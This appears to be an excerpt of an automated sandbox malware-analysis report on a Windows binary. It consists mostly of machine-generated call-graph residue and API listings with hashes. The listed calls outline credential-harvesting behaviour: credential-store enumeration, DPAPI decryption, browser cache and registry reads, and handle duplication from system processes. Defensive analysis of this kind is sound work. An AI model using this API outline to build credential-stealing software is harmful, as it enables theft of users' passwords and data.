calls 38508->38509 38509->38502 38509->38504 38509->38505 38509->38507 38509->38508 38511 445f3a 38509->38511 38910 409b98 GetFileAttributesW 38509->38910 38911 445093 23 API calls 38511->38911 38513->38312 38514->38314 38515->38312 38516->38307 38518 40c775 38517->38518 38913 40b1ab ??3@YAXPAX ??3@YAXPAX 38518->38913 38520 40c788 38914 40b1ab ??3@YAXPAX ??3@YAXPAX 38520->38914 38522 40c790 38915 40b1ab ??3@YAXPAX ??3@YAXPAX 38522->38915 38524 40c798 38525 40aa04 ??3@YAXPAX 38524->38525 38526 40c7a0 38525->38526 38916 40c274 memset 38526->38916 38531 40a8ab 9 API calls 38532 40c7c3 38531->38532 38533 40a8ab 9 API calls 38532->38533 38534 40c7d0 38533->38534 38945 40c3c3 38534->38945 38538 40c877 38547 40bdb0 38538->38547 38539 40c86c 38987 4053fe 39 API calls 38539->38987 38541 40c7e5 38541->38538 38541->38539 38546 40c634 50 API calls 38541->38546 38970 40a706 38541->38970 38546->38541 39155 404363 38547->39155 38550 40bf5d 39175 40440c 38550->39175 38552 40bdee 38552->38550 38555 40b2cc 27 API calls 38552->38555 38553 40bddf CredEnumerateW 38553->38552 38556 40be02 wcslen 38555->38556 38556->38550 38559 40be1e 38556->38559 38557 40be26 _wcsncoll 38557->38559 38559->38550 38559->38557 38561 40be7d memset 38559->38561 38562 40bea7 memcpy 38559->38562 38563 40bf11 wcschr 38559->38563 38564 40b2cc 27 API calls 38559->38564 38566 40bf43 LocalFree 38559->38566 39178 40bd5d 28 API calls 38559->39178 39179 404423 38559->39179 38561->38559 38561->38562 38562->38559 38562->38563 38563->38559 38565 40bef6 _wcsnicmp 38564->38565 38565->38559 38565->38563 38566->38559 38567 4135f7 39194 4135e0 38567->39194 38570 40b2cc 27 API calls 38571 41360d 38570->38571 38572 40a804 8 API calls 38571->38572 38573 413613 38572->38573 38574 41361b 38573->38574 38575 41363e 38573->38575 38576 40b273 27 API calls 38574->38576 38577 4135e0 FreeLibrary 38575->38577 38578 413625 GetProcAddress 38576->38578 38579 413643 38577->38579 38578->38575 38580 413648 38578->38580 38579->38344 38581 413658 
38580->38581 38582 4135e0 FreeLibrary 38580->38582 38581->38344 38583 413666 38582->38583 38583->38344 39197 4449b9 38584->39197 38587 444c1f 38587->38322 38588 4449b9 42 API calls 38590 444b4b 38588->38590 38589 444c15 38591 4449b9 42 API calls 38589->38591 38590->38589 39218 444972 GetVersionExW 38590->39218 38591->38587 38593 444b99 memcmp 38598 444b8c 38593->38598 38594 444c0b 39222 444a85 42 API calls 38594->39222 38598->38593 38598->38594 39219 444aa5 42 API calls 38598->39219 39220 40a7a0 GetVersionExW 38598->39220 39221 444a85 42 API calls 38598->39221 38601 40399d 38600->38601 39223 403a16 38601->39223 38603 403a09 39237 40b1ab ??3@YAXPAX ??3@YAXPAX 38603->39237 38605 4039a3 38605->38603 38609 4039f4 38605->38609 39234 40a02c CreateFileW 38605->39234 38606 403a12 wcsrchr 38606->38336 38609->38603 38610 4099c6 2 API calls 38609->38610 38610->38603 38612 414c2e 16 API calls 38611->38612 38613 404048 38612->38613 38614 414c2e 16 API calls 38613->38614 38615 404056 38614->38615 38616 409d1f 6 API calls 38615->38616 38617 404073 38616->38617 38618 409d1f 6 API calls 38617->38618 38619 40408e 38618->38619 38620 409d1f 6 API calls 38619->38620 38621 4040a6 38620->38621 38622 403af5 20 API calls 38621->38622 38623 4040ba 38622->38623 38624 403af5 20 API calls 38623->38624 38625 4040cb 38624->38625 39264 40414f memset 38625->39264 38627 404140 39278 40b1ab ??3@YAXPAX ??3@YAXPAX 38627->39278 38629 4040ec memset 38632 4040e0 38629->38632 38630 404148 38630->38392 38631 4099c6 2 API calls 38631->38632 38632->38627 38632->38629 38632->38631 38633 40a8ab 9 API calls 38632->38633 38633->38632 39291 40a6e6 WideCharToMultiByte 38634->39291 38636 4087ed 39292 4095d9 memset 38636->39292 38639 408953 38639->38392 38640 408809 memset memset memset memset memset 38641 40b2cc 27 API calls 38640->38641 38642 4088a1 38641->38642 38643 409d1f 6 API calls 38642->38643 38644 4088b1 38643->38644 38645 40b2cc 27 API calls 38644->38645 38646 4088c0 38645->38646 38647 409d1f 6 API calls 
38646->38647 38648 4088d0 38647->38648 38649 40b2cc 27 API calls 38648->38649 38650 4088df 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 4088ef 38651->38652 38653 40b2cc 27 API calls 38652->38653 38654 4088fe 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 40890e 38655->38656 38657 40b2cc 27 API calls 38656->38657 38658 40891d 38657->38658 38659 409d1f 6 API calls 38658->38659 38660 40892d 38659->38660 39311 409b98 GetFileAttributesW 38660->39311 38662 40893e 38663 408943 38662->38663 38664 408958 38662->38664 39312 407fdf 75 API calls 38663->39312 39313 409b98 GetFileAttributesW 38664->39313 38667 408964 38668 408969 38667->38668 38669 40897b 38667->38669 39314 4082c7 199 API calls 38668->39314 39315 409b98 GetFileAttributesW 38669->39315 38672 408987 38673 4089a1 38672->38673 38674 40898c 38672->38674 38686 40b633 ??3@YAXPAX 38685->38686 38687 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38686->38687 38688 413f00 Process32NextW 38687->38688 38689 413da5 OpenProcess 38688->38689 38690 413f17 CloseHandle 38688->38690 38691 413df3 memset 38689->38691 38694 413eb0 38689->38694 38690->38430 39613 413f27 38691->39613 38693 413ebf ??3@YAXPAX 38693->38694 38694->38688 38694->38693 38695 4099f4 3 API calls 38694->38695 38695->38694 38697 413e37 GetModuleHandleW 38698 413e1f 38697->38698 38699 413e46 GetProcAddress 38697->38699 38698->38697 39618 413959 38698->39618 39634 413ca4 38698->39634 38699->38698 38701 413ea2 CloseHandle 38701->38694 38703 414c2e 16 API calls 38702->38703 38704 403eb7 38703->38704 38705 414c2e 16 API calls 38704->38705 38706 403ec5 38705->38706 38707 409d1f 6 API calls 38706->38707 38708 403ee2 38707->38708 38709 409d1f 6 API calls 38708->38709 38710 403efd 38709->38710 38711 409d1f 6 API calls 38710->38711 38712 403f15 38711->38712 38713 403af5 20 API calls 38712->38713 38714 403f29 38713->38714 38715 403af5 20 API calls 38714->38715 38716 403f3a 38715->38716 38717 40414f 33 API calls 38716->38717 38718 403f4f 
38717->38718 38719 403faf 38718->38719 38721 403f5b memset 38718->38721 38723 4099c6 2 API calls 38718->38723 38724 40a8ab 9 API calls 38718->38724 39648 40b1ab ??3@YAXPAX ??3@YAXPAX 38719->39648 38721->38718 38722 403fb7 38722->38374 38723->38718 38724->38718 38726 414c2e 16 API calls 38725->38726 38727 403d26 38726->38727 38728 414c2e 16 API calls 38727->38728 38729 403d34 38728->38729 38730 409d1f 6 API calls 38729->38730 38731 403d51 38730->38731 38732 409d1f 6 API calls 38731->38732 38733 403d6c 38732->38733 38734 409d1f 6 API calls 38733->38734 38735 403d84 38734->38735 38736 403af5 20 API calls 38735->38736 38737 403d98 38736->38737 38738 403af5 20 API calls 38737->38738 38739 403da9 38738->38739 38740 40414f 33 API calls 38739->38740 38744 403dbe 38740->38744 38741 403e1e 39649 40b1ab ??3@YAXPAX ??3@YAXPAX 38741->39649 38742 403dca memset 38742->38744 38744->38741 38744->38742 38746 4099c6 2 API calls 38744->38746 38747 40a8ab 9 API calls 38744->38747 38745 403e26 38745->38378 38746->38744 38747->38744 38749 414b81 9 API calls 38748->38749 38750 414c40 38749->38750 38751 414c73 memset 38750->38751 39650 409cea 38750->39650 38752 414c94 38751->38752 39653 414592 RegOpenKeyExW 38752->39653 38756 414c64 38756->38370 38757 414cc1 38758 414cf4 wcscpy 38757->38758 39654 414bb0 wcscpy 38757->39654 38758->38756 38760 414cd2 39655 4145ac RegQueryValueExW 38760->39655 38762 414ce9 RegCloseKey 38762->38758 38764 409d62 38763->38764 38765 409d43 wcscpy 38763->38765 38764->38411 38766 409719 2 API calls 38765->38766 38767 409d51 wcscat 38766->38767 38767->38764 38769 40aebe FindClose 38768->38769 38770 40ae21 38769->38770 38771 4099c6 2 API calls 38770->38771 38772 40ae35 38771->38772 38773 409d1f 6 API calls 38772->38773 38774 40ae49 38773->38774 38774->38447 38776 40ade0 38775->38776 38777 40ae0f 38775->38777 38776->38777 38778 40ade7 wcscmp 38776->38778 38777->38447 38778->38777 38779 40adfe wcscmp 38778->38779 38779->38777 38781 40ae18 9 API calls 38780->38781 38787 
4453c4 38781->38787 38782 40ae51 9 API calls 38782->38787 38783 4453f3 38785 40aebe FindClose 38783->38785 38784 40add4 2 API calls 38784->38787 38786 4453fe 38785->38786 38786->38447 38787->38782 38787->38783 38787->38784 38788 445403 254 API calls 38787->38788 38788->38787 38790 40ae7b FindNextFileW 38789->38790 38791 40ae5c FindFirstFileW 38789->38791 38792 40ae94 38790->38792 38793 40ae8f 38790->38793 38791->38792 38795 40aeb6 38792->38795 38796 409d1f 6 API calls 38792->38796 38794 40aebe FindClose 38793->38794 38794->38792 38795->38447 38796->38795 38797->38377 38798->38433 38799->38422 38800->38422 38801->38448 38803 409c89 38802->38803 38803->38471 38804->38501 38806 413d39 38805->38806 38807 413d2f FreeLibrary 38805->38807 38808 40b633 ??3@YAXPAX 38806->38808 38807->38806 38809 413d42 38808->38809 38810 40b633 ??3@YAXPAX 38809->38810 38811 413d4a 38810->38811 38811->38330 38812->38334 38813->38380 38814->38395 38816 44db70 38815->38816 38817 40b6fc memset 38816->38817 38818 409c70 2 API calls 38817->38818 38819 40b732 wcsrchr 38818->38819 38820 40b743 38819->38820 38821 40b746 memset 38819->38821 38820->38821 38822 40b2cc 27 API calls 38821->38822 38823 40b76f 38822->38823 38824 409d1f 6 API calls 38823->38824 38825 40b783 38824->38825 39656 409b98 GetFileAttributesW 38825->39656 38827 40b792 38828 40b7c2 38827->38828 38829 409c70 2 API calls 38827->38829 39657 40bb98 38828->39657 38831 40b7a5 38829->38831 38833 40b2cc 27 API calls 38831->38833 38836 40b7b2 38833->38836 38834 40b837 FindCloseChangeNotification 38838 40b83e memset 38834->38838 38835 40b817 39691 409a45 GetTempPathW 38835->39691 38839 409d1f 6 API calls 38836->38839 39690 40a6e6 WideCharToMultiByte 38838->39690 38839->38828 38840 40b827 CopyFileW 38840->38838 38842 40b866 38843 444432 121 API calls 38842->38843 38844 40b879 38843->38844 38845 40bad5 38844->38845 38846 40b273 27 API calls 38844->38846 38847 40baeb 38845->38847 38848 40bade DeleteFileW 38845->38848 38849 40b89a 38846->38849 
38850 40b04b ??3@YAXPAX 38847->38850 38848->38847 38851 438552 134 API calls 38849->38851 38852 40baf3 38850->38852 38853 40b8a4 38851->38853 38852->38405 38854 40bacd 38853->38854 38856 4251c4 137 API calls 38853->38856 38855 443d90 111 API calls 38854->38855 38855->38845 38878 40b8b8 38856->38878 38857 40bac6 39703 424f26 123 API calls 38857->39703 38858 40b8bd memset 39694 425413 17 API calls 38858->39694 38861 425413 17 API calls 38861->38878 38864 40a71b MultiByteToWideChar 38864->38878 38867 40b9b5 memcmp 38867->38878 38868 4099c6 2 API calls 38868->38878 38869 404423 38 API calls 38869->38878 38872 40bb3e memset memcpy 39704 40a734 MultiByteToWideChar 38872->39704 38873 4251c4 137 API calls 38873->38878 38875 40bb88 LocalFree 38875->38878 38878->38857 38878->38858 38878->38861 38878->38864 38878->38867 38878->38868 38878->38869 38878->38872 38878->38873 38879 40ba5f memcmp 38878->38879 38880 40a734 MultiByteToWideChar 38878->38880 39695 4253ef 16 API calls 38878->39695 39696 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38878->39696 39697 4253af 17 API calls 38878->39697 39698 4253cf 17 API calls 38878->39698 39699 447280 memset 38878->39699 39700 447960 memset memcpy memcpy memcpy 38878->39700 39701 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38878->39701 39702 447920 memcpy memcpy memcpy 38878->39702 38879->38878 38880->38878 38881->38407 38883 40aed1 38882->38883 38884 40aec7 FindClose 38882->38884 38883->38461 38884->38883 38886 4099d7 38885->38886 38887 4099da memcpy 38885->38887 38886->38887 38887->38391 38889 40b2cc 27 API calls 38888->38889 38890 44543f 38889->38890 38891 409d1f 6 API calls 38890->38891 38892 44544f 38891->38892 39791 409b98 GetFileAttributesW 38892->39791 38894 44545e 38895 445476 38894->38895 38896 40b6ef 253 API calls 38894->38896 38897 40b2cc 27 API calls 38895->38897 38896->38895 38898 445482 38897->38898 38899 409d1f 6 API calls 38898->38899 38900 445492 38899->38900 39792 409b98 GetFileAttributesW 38900->39792 38902 4454a1 38903 
[Execution graph residue: edge list (node id, code address, API calls per node) spilled from the report's interactive call-graph viewer; the graph image itself is not part of the text. API calls recoverable from the edge list: FindFirstUrlCacheEntryW / FindNextUrlCacheEntryW / FindCloseUrlCache, RegOpenKeyExW / RegEnumValueW / RegCloseKey, CryptUnprotectData, OpenProcess / GetCurrentProcess / DuplicateHandle, CreateFileW / CreateFileMappingW / MapViewOfFile / WriteFile / UnmapViewOfFile, GetTempPathW / GetWindowsDirectoryW / GetTempFileNameW, SetFilePointerEx / ReadFile, GetFileAttributesW / DeleteFileW / GetFileTime / CompareFileTime, GetProcAddress / GetModuleHandleW / FreeLibrary, K32GetModuleFileNameExW, GetProcessTimes, GetVersionExW, GetPrivateProfileStringW / WritePrivateProfileStringW, FindResourceW / SizeofResource / LoadResource / LockResource, EnumResourceNamesW, WideCharToMultiByte / MultiByteToWideChar, LocalFree.]
37795 41bf20 37795->37787 37797 41ac3f memset 37796->37797 37799 41ac52 37796->37799 37798 41acd9 37797->37798 37798->37794 37801 41ac6a 37799->37801 37812 41dc14 19 API calls 37799->37812 37802 41aca1 37801->37802 37813 41519d 37801->37813 37802->37798 37804 41acc0 memset 37802->37804 37805 41accd memcpy 37802->37805 37804->37798 37805->37798 37806->37779 37807->37782 37808->37790 37809->37795 37810->37794 37812->37801 37816 4175ed 37813->37816 37824 417570 SetFilePointer 37816->37824 37819 4151b3 37819->37802 37820 41760a ReadFile 37821 417637 37820->37821 37822 417627 GetLastError 37820->37822 37821->37819 37823 41763e memset 37821->37823 37822->37819 37823->37819 37825 4175b2 37824->37825 37826 41759c GetLastError 37824->37826 37825->37819 37825->37820 37826->37825 37827 4175a8 GetLastError 37826->37827 37827->37825 37828->37773 37829 417bc5 37830 417c61 37829->37830 37831 417bda 37829->37831 37831->37830 37832 417bf6 UnmapViewOfFile CloseHandle 37831->37832 37834 417c2c 37831->37834 37836 4175b7 37831->37836 37832->37831 37832->37832 37834->37831 37841 41851e 20 API calls 37834->37841 37837 4175d6 FindCloseChangeNotification 37836->37837 37838 4175c8 37837->37838 37839 4175df 37837->37839 37838->37839 37840 4175ce Sleep 37838->37840 37839->37831 37840->37837 37841->37834 39793 4147f3 39796 414561 39793->39796 39795 414813 39797 41456d 39796->39797 39798 41457f GetPrivateProfileIntW 39796->39798 39801 4143f1 memset _itow WritePrivateProfileStringW 39797->39801 39798->39795 39800 41457a 39800->39795 39801->39800

Control-flow Graph: function at 0040DD85 (basic blocks marked Executed / Not Executed are rendered only in the interactive report; the API calls per block are listed below with their call-site addresses).
                                APIs
                                • memset.MSVCRT ref: 0040DDAD
                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                • _wcsicmp.MSVCRT ref: 0040DED8
                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                • memset.MSVCRT ref: 0040DF5F
                                • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                • API String ID: 594330280-3398334509
                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

Control-flow Graph: function at 00413D4C (basic blocks marked Executed / Not Executed are rendered only in the interactive report; the API calls per block are listed below with their call-site addresses).
                                APIs
                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                • memset.MSVCRT ref: 00413D7F
                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                • memset.MSVCRT ref: 00413E07
                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                • API String ID: 912665193-1740548384
                                • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                • memcpy.MSVCRT ref: 0040B60D
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                • String ID: BIN
                                • API String ID: 1668488027-1015027815
                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                APIs
                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                  • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                • String ID:
                                • API String ID: 2947809556-0
                                • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                • String ID:
                                • API String ID: 767404330-0
                                • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                APIs
                                • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: FileFind$FirstNext
                                • String ID:
                                • API String ID: 1690352074-0
                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                APIs
                                • memset.MSVCRT ref: 0041898C
                                • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: InfoSystemmemset
                                • String ID:
                                • API String ID: 3558857096-0
                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

Control-flow Graph: function at 0044553B (basic blocks marked Executed / Not Executed are rendered only in the interactive report; the API calls per block are listed below with their call-site addresses).
                                APIs
                                • memset.MSVCRT ref: 004455C2
                                • wcsrchr.MSVCRT ref: 004455DA
                                • memset.MSVCRT ref: 0044570D
                                • memset.MSVCRT ref: 00445725
                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                  • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                  • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                • memset.MSVCRT ref: 0044573D
                                • memset.MSVCRT ref: 00445755
                                • memset.MSVCRT ref: 004458CB
                                • memset.MSVCRT ref: 004458E3
                                • memset.MSVCRT ref: 0044596E
                                • memset.MSVCRT ref: 00445A10
                                • memset.MSVCRT ref: 00445A28
                                • memset.MSVCRT ref: 00445AC6
                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                • memset.MSVCRT ref: 00445B52
                                • memset.MSVCRT ref: 00445B6A
                                • memset.MSVCRT ref: 00445C9B
                                • memset.MSVCRT ref: 00445CB3
                                • _wcsicmp.MSVCRT ref: 00445D56
                                • memset.MSVCRT ref: 00445B82
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
